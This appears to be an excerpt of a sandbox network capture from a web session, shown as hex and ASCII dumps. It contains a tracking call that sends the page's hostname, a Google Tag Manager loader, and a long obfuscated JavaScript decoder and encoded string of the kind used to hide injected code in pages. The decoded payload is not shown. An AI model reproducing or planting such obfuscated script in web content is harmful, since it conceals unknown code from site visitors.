                                                                          2023-11-21 16:58:39 UTC12INData Raw: 76 61 72 20 73 32 20 3d 20 22 31 30 39 31 31 31 34 37 35 32 22 3b 0a 20 20 20 20 76 61 72 20 66 70 20 3d 20 22 30 30 37 35 31 66 64 66 66 38 61 30 66 33 63 66 32 32 62 37 63 66 35 39 63 32 34 65 35 66 30 39 22 3b 0a 20 20 20 20 76 61 72 20 65 73 6f 75 72 63 65 20 3d 20 62 74 6f 61 28 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 3b 0a 20 20 20 20 4d 59 43 41 4c 4c 2e 69 6e 69 74 28 5b 73 31 2c 73 32 2c 65 73 6f 75 72 63 65 2c 66 70 5d 29 3b 0a 20 20 20 20 4d 59 43 41 4c 4c 2e 73 65 6e 64 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c
                                                                          Data Ascii: var s2 = "1091114752"; var fp = "00751fdff8a0f3cf22b7cf59c24e5f09"; var esource = btoa(location.hostname); MYCALL.init([s1,s2,esource,fp]); MYCALL.send();</script>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l
                                                                          2023-11-21 16:58:39 UTC13INData Raw: 6e 2c 74 2c 65 2c 72 29 7b 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 3d 30 2c 6c 65 6e 3d 68 2e 6c 65 6e 67 74 68 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 22 22 3b 77 68 69 6c 65 28 68 5b 69 5d 21 3d 3d 6e 5b 65 5d 29 7b 73 2b 3d 68 5b 69 5d 3b 69 2b 2b 7d 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 6e 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 73 3d 73 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 5b 6a 5d 2c 22 67 22 29 2c 6a 29 3b 72 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 5f 30 78 65 37 63 28 73 2c 65 2c 31 30 29 2d 74 29 7d 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 72 29 29 7d 28 22 72 75 47 41 72 6e 75 41 72 75 72 41 72 54 6c 41 72 6e 6c 41 72 75
                                                                          Data Ascii: n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe7c(s,e,10)-t)}return decodeURIComponent(escape(r))}("ruGArnuArurArTlArnlAru
                                                                          2023-11-21 16:58:39 UTC14INData Raw: 6e 47 41 72 75 54 41 72 6d 53 41 72 72 6d 41 72 54 6c 41 72 54 72 41 72 75 54 41 72 6e 53 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 6d 47 41 6e 75 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6d 47 41 6e 75 41 72 54 6c 41 72 6e 47 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 72 41 72 75 6e 41 72 53 54 41 72 54 53 41 53 6e 41 72 6e 6c 41 72 75 6c 41 72 6e 53 41 72 54 6c 41 72 53 75 41 72 75 47 41 72 6e 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72
                                                                          Data Ascii: nGAruTArmSArrmArTlArTrAruTArnSArulArTrArTrArmGAnuArnGAruTArmSArmGAnuArTlArnGArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAumArurArunArSTArTSASnArnlArulArnSArTlArSuAruGArnrArSGAumArmSArmGArTrArnnArSTArnSArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTr
                                                                          2023-11-21 16:58:39 UTC16INData Raw: 72 47 41 72 75 6c 41 72 53 54 41 72 6e 47 41 72 54 72 41 72 6d 47 41 6e 75 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6d 47 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6c 75 41 72 75 54 41 72 54 6d 41 72 75 6c 41 72 6e 47 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 6d 47 41 6e 75 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6d 47 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 72 54 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 54 6d 41 72 6e 53 41 72 75 6c 41 72 54 47 41 72 6d 47 41 6e 75 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6d 47 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6c 47 41 72 6c 53 41 72 6d 47 41 6e 75 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 6d 47 41 72 6e 47 41 72 75 54 41 72 6d 53 41 72 47 6e 41 72 54 6d 41 72 75 6c 41 72 6e 6e 41 72 53 54 41 72 75 54 41
                                                                          Data Ascii: rGArulArSTArnGArTrArmGAnuArnGAruTArmSArmGArnGAruTArmSArluAruTArTmArulArnGArulArTrArTrArmGAnuArnGAruTArmSArmGArnGAruTArmSArrTArnSArTGArulArTmArnSArulArTGArmGAnuArnGAruTArmSArmGArnGAruTArmSArlGArlSArmGAnuArnGAruTArmSArmGArnGAruTArmSArGnArTmArulArnnArSTAruTA
                                                                          2023-11-21 16:58:39 UTC17INData Raw: 72 54 6c 41 72 54 6d 41 72 54 53 41 72 75 6c 41 72 54 54 41 53 6e 41 72 6e 6c 41 72 75 6d 41 6e 6c 41 54 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 54 41 72 75 47 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 53 54 41 72 75 54 41 72 6e 53 41 72 75 6c 41 72 54 6d 41 6e 6c 41 72 54 72 41 72 54 6c 41 72 54 6d 41 72 54 53 41 72 75 6c 41 72 54 54 41 72 53 47 41 75 6d 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 6c 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 53 54 41 72 75 75 41 72 75 6c 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 53 54 41 72 75 54 41 72 6e 53 41 72 75 6c 41 72 54
                                                                          Data Ascii: rTlArTmArTSArulArTTASnArnlArumAnlATrArSGAumArmSArmGAruGAruTArTSASnAruTAruGArmlArSGAumArurArnuArnSArTGArSTAruTArnSArulArTmAnlArTrArTlArTmArTSArulArTTArSGAumASnArurArnGArSTArTrArTrArmlArSGAumArnlArulArTrArTrArSTAruuArulAnlArurArnuArnSArTGArSTAruTArnSArulArT
                                                                          2023-11-21 16:58:39 UTC18INData Raw: 72 54 72 41 72 54 47 41 72 54 6d 41 72 6e 75 41 72 6e 53 41 72 75 75 41 72 6d 53 41 72 75 54 41 72 6e 53 41 72 75 6c 41 72 54 72 41 53 6e 41 72 75 75 41 72 54 6d 41 72 6e 75 41 72 54 6c 41 72 6e 6e 41 72 6d 47 41 6e 75 41 72 54 72 41 72 54 47 41 72 54 6d 41 72 6e 75 41 72 6e 53 41 72 75 75 41 72 6d 53 41 72 6d 47 41 6e 75 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 72 6d 47 41 6e 75 41 72 6e 6e 41 72 6d 53 41 72 6d 47 41 72 6e 6e 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 6c 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 53 54 41 72 75 75 41 72 75 6c 41 6e 6c 41 72 75 6c 41 72 54 53 41 72 75 6c 41 72 54 6d 41 72 54 54 41 72 53 47 41 75 6d 41 72 6d 53 41 72 72 6c 41 72 54 53
                                                                          Data Ascii: rTrArTGArTmArnuArnSAruuArmSAruTArnSArulArTrASnAruuArTmArnuArTlArnnArmGAnuArTrArTGArTmArnuArnSAruuArmSArmGAnuArTrArnnArSTArnSArmSArmGAnuArnnArmSArmGArnnASnArurArnGArSTArTrArTrArmlArSGAumArnlArulArTrArTrArSTAruuArulAnlArulArTSArulArTmArTTArSGAumArmSArrlArTS
                                                                          2023-11-21 16:58:39 UTC20INData Raw: 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 6c 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 53 54 41 72 75 75 41 72 75 6c 41 6e 6c 41 72 54 47 41 72 6e 72 41 53 6e 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 6e 75 41 72 54 6d 41 6e 6c 41 72 6e 6e 41 72 54 6d 41 72 75 54 41 72 6e 6c 41 72 53 54 41 72 54 6d 41 72 54 54 41 6e 6c 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 53 6e 41 72 6e 6c 41 72 75 6d 41 6e 6c 41 54 6d 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 54 47 41 72 54 6d 41 72 6e 75 41 72 6e 53 41 72 75 75 41 72 6d 53 41 72 6c 47 41 72 6e 75 41 53 6e 41 72 54 47 41 72 75 6e 41 72 53 54 41 72 6e 53 41 72 6e 72 41 53 6e 41 72 54 54 41 72 6e 75 41 72 54 6c 41 53 6e 41 72 75 53 41 72 6e 75 41 72 54 6d 41 53 6e 41 72 54
                                                                          Data Ascii: rArTrArmlArSGAumArnlArulArTrArTrArSTAruuArulAnlArTGArnrASnArurArnuArnGArnuArTmAnlArnnArTmAruTArnlArSTArTmArTTAnlArTGArulArTnArTGASnArnlArumAnlATmArSGAumArmSArmGArTrArTGArTmArnuArnSAruuArmSArlGArnuASnArTGArunArSTArnSArnrASnArTTArnuArTlASnAruSArnuArTmASnArT
                                                                          2023-11-21 16:58:39 UTC21INData Raw: 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 53 54 41 72 75 75 41 72 75 6c 41 6e 6c 41 72 54 47 41 72 75 54 41 72 6e 6c 41 72 6e 6c 41 72 75 54 41 72 6e 53 41 72 75 75 41 53 6e 41 72 6e 6c 41 72 75 6d 41 6e 6c 41 6e 6e 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 54 47 41 72 54 6d 41 72 6e 75 41 72 6e 53 41 72 75 75 41 72 6d 53 41 72 6c 54 41 72 6e 75 41 72 54 6c 41 53 6e 41 72 75 6e 41 72 53 54 41 72 54 53 41 72 75 6c 41 53 6e 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 54 41 72 75 47 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 47 41 72 75 54 41 72 6e 6c 41 72 75 6c 41 72 53 47 41 75 6d 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 47 41 72 75
                                                                          Data Ascii: ArulArTrArTrArSTAruuArulAnlArTGAruTArnlArnlAruTArnSAruuASnArnlArumAnlAnnArSGAumArmSArmGArTrArTGArTmArnuArnSAruuArmSArlTArnuArTlASnArunArSTArTSArulASnArmGArTrArnnArSTArnSASnAruTAruGArmlArSGAumArTGAruTArnlArulArSGAumASnArurArnGArSTArTrArTrArmlArSGAumArTGAru
                                                                          2023-11-21 16:58:39 UTC22INData Raw: 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 75 54 41 72 6e 53 41 72 54 6c 41 72 75 6c 41 53 6e 41 72 75 6d 41 72 75 75 41 6e 6c 41 72 6e 6e 41 72 54 6d 41 72 75 54 41 72 6e 6c 41 72 53 54 41 72 54 6d 41 72 54 54 41 72 53 47 41 75 6d 41 53 6e 41 72 6e 75 41 72 6e 53 41 72 72 72 41 72 6e 47 41 72 75 54 41 72 75 72 41 72 6e 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 72 41 72 54 47 41 72 53 54 41 72 54 6d 41 72 54 47 41 72 6c 72 41 72 54 6c 41 72 54 6d 41 72 54 53 41 72 75 6c 41 72 54 54 41 72 6c 6c 41 75 6e 41 54 72 41 54 54 41 75 54 41 72 53 47 41 75 6d 41 53 6e 41 72 54 72 41 72 54 47 41 72 54 54 41 72 6e 47 41 72 75 6c 41 72 6d 6c 41 72 53
                                                                          Data Ascii: SASnArurArnGArSTArTrArTrArmlArSGAumArurArnuArnSArTGAruTArnSArTlArulASnArumAruuAnlArnnArTmAruTArnlArSTArTmArTTArSGAumASnArnuArnSArrrArnGAruTArurArnrArmlArSGAumArTrArTGArSTArTmArTGArlrArTlArTmArTSArulArTTArllAunATrATTAuTArSGAumASnArTrArTGArTTArnGArulArmlArS
                                                                          2023-11-21 16:58:39 UTC24INData Raw: 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 47 41 72 75 6e 41 72 53 54 41 72 6e 53 41 72 6e 72 41 72 54 54 41 72 6e 75 41 72 54 6c 41 6e 6c 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 54 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 75 41 72 75 47 41 72 54 6c 41 72 75 6c 41 72 53 75 41 72 75 6e 41 72 53 47 41 75 75 41 72 6d 53 41 72 72 47 41 72 54 6c 41 72 75 6c 41 53 6e 41 72 54 47 41 72 6e 75 41 53 6e 41 72 75 6e 41 72 75 54 41 72 75 75 41 72 75 6e 41 53 6e 41 72 75 47 41 72 75 6c 41
                                                                          Data Ascii: GArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAumArTGArunArSTArnSArnrArTTArnuArTlAnlArTGArulArTnArTGATrArSGAumArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAuuAruGArTlArulArSuArunArSGAuuArmSArrGArTlArulASnArTGArnuASnArunAruTAruuArunASnAruGArulA
                                                                          2023-11-21 16:58:39 UTC25INData Raw: 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 72 41 72 54 6c 41 72 75 72 41 72 75 72 41 72 75 6c 41 72 54 72 41 72 54 72 41 6e 6c 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 6c 75 6d 41 47 53 47 41 47 6c 72 41 53 6e 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 72 6c 72 41 72 54 6c 41 72 75 72 41 72 75 72 41 72 75 6c 41 72 54 72 41 72 54 72 41 72 75 53 41 72 54 6c 41 72 6e 47 41 72 6e 47 41 72 54 54 41 72 6d 47 41 6e 75 41 72 54 72 41 72 6e 6e 41 72 53 54 41
                                                                          Data Ascii: ArnnArSTArnSArmSArmGAruGAruTArTSASnArurArnGArSTArTrArTrArmlArSGAumArTrArTlArurArurArulArTrArTrAnlArTGArulArTnArTGArSGAumArmSArmGArTrArnnArSTArnSArmSAlumAGSGAGlrASnArmGArTrArnnArSTArnSArmSArlrArTlArurArurArulArTrArTrAruSArTlArnGArnGArTTArmGAnuArTrArnnArSTA
                                                                          2023-11-21 16:58:39 UTC26INData Raw: 6c 41 72 54 72 41 72 54 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 54 41 72 6e 53 41 72 6e 6e 41 72 54 6c 41 72 54 47 41 53 6e 41 72 75 54 41 72 75 47 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 72 41 72 6e 72 41 72 75 54 41 72 6e 6e 41 6e 6c 41 72 6e 47 41 72 53 54 41 72 6e 53 41 72 75 75 41 6e 6c 41 72 54 6d 41 72 75 6c 41 72 54 75 41 72 53 54 41 72 54 6d 41 72 75 47 41 72 53 47 41 75 6d 41 53 6e 41 72 54 47 41 72 54 54 41 72 6e 6e 41 72 75 6c 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 6e 41 72 75 54 41 72 75 47 41 72 75 47 41 72 75 6c 41 72 6e 53 41 72 53 47 41 75 6d 41 53 6e 41 72 54 53 41 72 53 54 41 72 6e 47 41 72 54 6c 41 72 75 6c 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6c 72 41 72 6e 72 41 72 75 54 41 72 6e 6e 41 53 6e 41 72 54 47 41 72
                                                                          Data Ascii: lArTrArTrArSGAumArmSArmGAruTArnSArnnArTlArTGASnAruTAruGArmlArSGAumArTrArnrAruTArnnAnlArnGArSTArnSAruuAnlArTmArulArTuArSTArTmAruGArSGAumASnArTGArTTArnnArulArmlArSGAumArunAruTAruGAruGArulArnSArSGAumASnArTSArSTArnGArTlArulArmlArSGAumArlrArnrAruTArnnASnArTGAr
                                                                          2023-11-21 16:58:39 UTC28INData Raw: 72 75 54 41 72 75 47 41 72 53 47 41 75 6d 41 53 6e 41 72 54 53 41 72 53 54 41 72 6e 47 41 72 54 6c 41 72 75 6c 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 53 47 41 75 6d 41 53 6e 41 6e 75 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 6e 6c 41 72 75 72 41 72 75 6c 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 54 6d 41 72 53 47 41 75 6d 41 53 6e 41 72 75 54 41 72 75 47 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 54 41 72 54 6c 41 72 75 6c 41 72 54 72 41 72 54 47 41 72 75 54 41 72 6e 75 41 72 6e 53 41 72 6c 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 6e 75 41 72
                                                                          Data Ascii: ruTAruGArSGAumASnArTSArSTArnGArTlArulArmlArSGAumArSGAumASnAnuArmSArmGAruGAruTArTSASnArurArnGArSTArTrArTrArmlArSGAumArTGArulArTnArTGAnlArurArulArnSArTGArulArTmArSGAumASnAruTAruGArmlArSGAumArnTArTlArulArTrArTGAruTArnuArnSArlGArulArTnArTGArSGAumArmSArmGAnuAr
                                                                          2023-11-21 16:58:39 UTC29INData Raw: 53 47 41 75 6d 41 72 6d 53 41 6e 6e 41 75 6c 41 72 6d 47 41 6e 75 41 72 75 47 41 72 75 54 41 72 54 53 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 6e 41 72 54 6d 41 72 6e 75 41 72 75 75 41 72 54 6d 41 72 75 6c 41 72 54 72 41 72 54 72 41 53 6e 41 72 6e 6c 41 72 54 47 41 6e 6c 41 6e 54 41 72 53 47 41 75 6d 41 53 6e 41 72 54 72 41 72 54 47 41 72 54 54 41 72 6e 47 41 72 75 6c 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 6e 41 72 75 6c 41 72 75 54 41 72 75 75 41 72 75 6e 41 72 54 47 41 72 6d 6d 41 53 6e 41 6e 54 41 6e 6e 41 72 6e 6e 41 72 54 6e 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72
                                                                          Data Ascii: SGAumArmSAnnAulArmGAnuAruGAruTArTSArmSArmGAruGAruTArTSASnArurArnGArSTArTrArTrArmlArSGAumArnnArTmArnuAruuArTmArulArTrArTrASnArnlArTGAnlAnTArSGAumASnArTrArTGArTTArnGArulArmlArSGAumArunArulAruTAruuArunArTGArmmASnAnTAnnArnnArTnArSGAumArmSArmGAruGAruTArTSASnAr
                                                                          2023-11-21 16:58:39 UTC30INData Raw: 53 41 6e 53 41 6e 53 41 72 6d 47 41 6e 75 41 72 6e 6e 41 72 6d 53 41 72 6d 47 41 72 6e 6e 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 47 41 72 6e 75 41 72 53 54 41 72 75 47 41 72 53 75 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 54 6d 41 53 6e 41 72 6e 6c 41 72 75 6d 41 6e 6c 41 6e 54 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 54 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 53 41 72 53 54 41 53 6e 41 72 75 53 41 72 53 54 41 6e 6c 41 72 54 72 41 72 6e 6e 41 72 75 54 41 72 6e 53 41 72 6e 53 41 72 75 6c 41 72 54 6d 41 53 6e 41 72 75 53 41 72 53 54 41 6e 6c 41 72 54 72 41 72 6e 6e 41 72 75 54 41 72 6e 53 41 53
                                                                          Data Ascii: SAnSAnSArmGAnuArnnArmSArmGArnnASnArurArnGArSTArTrArTrArmlArSGAumArnGArnuArSTAruGArSuArTGArulArTnArTGATmASnArnlArumAnlAnTArSGAumArmSArmGAruTASnArurArnGArSTArTrArTrArmlArSGAumAruSArSTASnAruSArSTAnlArTrArnnAruTArnSArnSArulArTmASnAruSArSTAnlArTrArnnAruTArnSAS
                                                                          2023-11-21 16:58:39 UTC32INData Raw: 41 72 54 6c 41 72 54 72 41 72 54 47 41 72 75 54 41 72 75 53 41 72 54 54 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 6e 53 41 72 54 47 41 6e 6c 41 72 75 6d 41 72 75 6c 41 72 54 47 41 72 54 75 41 72 75 6c 41 72 75 6c 41 72 6e 53 41 53 6e 41 72 6e 6c 41 72 54 6e 41 6e 6c 41 72 53 54 41 72 54 6c 41 72 54 47 41 72 6e 75 41 72 53 47 41 75 6d 41 53 6e 41 72 75 54 41 72 75 47 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 54 41 72 6e 53 41 72 75 72 41 72 6e 47 41 72 54 6c 41 72 75 47 41 72 75 6c 41 72 75 47 41 72 72 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 6e 53 41 72 54 47 41 72 53 47 41 75 6d 41 53 6e 41 72 54 72 41 72 54 47 41 72 54 54 41 72 6e 47 41 72 75 6c 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 47 41 72 75 54 41
                                                                          Data Ascii: ArTlArTrArTGAruTAruSArTTAnlArurArnuArnSArTGArulArnSArTGAnlArumArulArTGArTuArulArulArnSASnArnlArTnAnlArSTArTlArTGArnuArSGAumASnAruTAruGArmlArSGAumAruTArnSArurArnGArTlAruGArulAruGArrrArnuArnSArTGArulArnSArTGArSGAumASnArTrArTGArTTArnGArulArmlArSGAumAruGAruTA
                                                                          2023-11-21 16:58:39 UTC33INData Raw: 6c 41 72 53 47 41 75 6d 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 6e 53 41 72 54 47 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 47 41 72 75 6c 41 72 54 72 41 72 75 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 47 41 72 75 6c 41 72 54 72 41 72 75 72 41 6e 6c 41 72 6e 53 41 72 53 54 41 72 6e 6c 41 72 75 6c 41 6e 6c 41 72 54 6c 41 72 54 72 41 72 75 6c 41 72 54 6d 41 53 6e 41 72 75 72 41
                                                                          Data Ascii: lArSGAumArurArnuArnSArTGArulArnSArTGAnlArurArnuArnGArSGAumArmSArmGAruGAruTArTSASnArurArnGArSTArTrArTrArmlArSGAumAruGArulArTrArurArSGAumArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAumAruGArulArTrArurAnlArnSArSTArnlArulAnlArTlArTrArulArTmASnArurA
                                                                          2023-11-21 16:58:39 UTC34INData Raw: 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 53 54 41 72 75 72 41 72 54 47 41 6e 6c 41 72 6e 47 41 72 75 54 41 72 6e 72 41 72 75 6c 41 53 6e 41 72 6e 6c 41 72 54 6d 41 6e 6c 41 54 6d 41 53 6e 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 6e 75 41 72 54 6d 41 6e 6c 41 72 6e 6e 41 72 54 6d 41 72 75 54 41 72 6e 6c 41 72 53 54 41 72 54 6d 41 72 54 54 41 6e 6c 41 72 54 47 41 72 75 6c 41 72 54 6e 41 72 54 47 41 72 53 47 41 75 6d 41 72 6d 53 41 72 47 47 41 72 75 54 41 72 6e 72 41 72 75 6c 41 72 6d 47 41 6e 75 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53
                                                                          Data Ascii: ArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAumArSTArurArTGAnlArnGAruTArnrArulASnArnlArTmAnlATmASnArurArnuArnGArnuArTmAnlArnnArTmAruTArnlArSTArTmArTTAnlArTGArulArTnArTGArSGAumArmSArGGAruTArnrArulArmGAnuArTrArnnArSTArnSArmSArmGArTrArnnArSTArnSAS
                                                                          2023-11-21 16:58:39 UTC36INData Raw: 6c 41 72 53 47 41 75 6d 41 72 75 72 41 72 6e 75 41 72 6e 53 41 72 54 47 41 72 75 6c 41 72 6e 53 41 72 54 47 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 75 47 41 72 75 54 41 72 54 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 47 41 72 75 6c 41 72 54 72 41 72 75 72 41 72 53 47 41 75 6d 41 72 6d 53 41 72 6d 47 41 72 54 72 41 72 6e 6e 41 72 53 54 41 72 6e 53 41 53 6e 41 72 75 72 41 72 6e 47 41 72 53 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 75 47 41 72 75 6c 41 72 54 72 41 72 75 72 41 6e 6c 41 72 6e 53 41 72 53 54 41 72 6e 6c 41 72 75 6c 41 6e 6c 41 72 54 6c 41 72 54 72 41 72 75 6c 41 72 54 6d 41 53 6e 41 72 75 72 41
                                                                          Data Ascii: lArSGAumArurArnuArnSArTGArulArnSArTGAnlArurArnuArnGArSGAumArmSArmGAruGAruTArTSASnArurArnGArSTArTrArTrArmlArSGAumAruGArulArTrArurArSGAumArmSArmGArTrArnnArSTArnSASnArurArnGArSTArTrArTrArmlArSGAumAruGArulArTrArurAnlArnSArSTArnlArulAnlArTlArTrArulArTmASnArurA
